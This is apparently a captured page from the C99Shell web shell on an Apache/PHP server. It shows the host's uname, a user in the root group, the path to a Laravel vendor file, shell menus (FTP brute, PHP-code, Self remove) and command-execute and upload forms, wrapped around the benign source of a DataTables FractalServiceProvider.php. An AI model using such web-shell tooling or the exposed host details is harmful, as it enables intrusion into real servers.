!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/yajra/laravel-datatables-fractal/src/   drwxr-xr-x
Free 28.72 GB of 117.98 GB (24.35%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     FractalServiceProvider.php (2.87 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Yajra\DataTables;

use 
Illuminate\Support\ServiceProvider;
use 
League\Fractal\Manager;
use 
League\Fractal\Serializer\DataArraySerializer;
use 
Yajra\DataTables\Commands\TransformerMakeCommand;
use 
Yajra\DataTables\Transformers\FractalTransformer;

class 
FractalServiceProvider extends ServiceProvider
{
    
/**
     * Indicates if loading of the provider is deferred.
     *
     * @var bool
     */
    
protected bool $defer false;

    
/**
     * Bootstrap the application events.
     *
     * @return void
     */
    
public function boot(): void
    
{
        
$this->mergeConfigFrom(__DIR__.'/../config/datatables-fractal.php''datatables-fractal');
        
$this->publishAssets();

        
$this->registerMacro();
    }

    
/**
     * Publish datatables assets.
     *
     * @return void
     */
    
protected function publishAssets(): void
    
{
        
$this->publishes(
            [
                
__DIR__.'/../config/datatables-fractal.php' => config_path('datatables-fractal.php'),
            ], 
'datatables-fractal'
        
);
    }

    
/**
     * Register DataTables macro methods.
     *
     * @return void
     */
    
protected function registerMacro(): void
    
{
        
DataTableAbstract::macro('setTransformer', function ($transformer) {
            
$this->transformer = [$transformer];

            return 
$this;
        });

        
DataTableAbstract::macro('addTransformer', function ($transformer) {
            
$this->transformer[] = $transformer;

            return 
$this;
        });

        
DataTableAbstract::macro('setSerializer', function ($serializer) {
            
$this->serializer $serializer;

            return 
$this;
        });
    }

    
/**
     * Register the service provider.
     *
     * @return void
     */
    
public function register(): void
    
{
        
$this->app->singleton('datatables.fractal', function () {
            
$fractal = new Manager;
            
$config $this->app['config'];
            
$request $this->app['request'];

            
$includesKey $config->get('datatables-fractal.includes''include');
            if (
$request->get($includesKey)) {
                
$fractal->parseIncludes($request->get($includesKey));
            }

            
$serializer $config->get('datatables-fractal.serializer'DataArraySerializer::class);
            
$fractal->setSerializer(new $serializer);

            return 
$fractal;
        });

        
$this->app->singleton('datatables.transformer', function () {
            return new 
FractalTransformer($this->app->make('datatables.fractal'));
        });

        
$this->commands([
            
TransformerMakeCommand::class,
        ]);
    }

    
/**
     * Get the services provided by the provider.
     *
     * @return array
     */
    
public function provides(): array
    {
        return [
            
'datatables.fractal',
            
'datatables.transformer',
        ];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--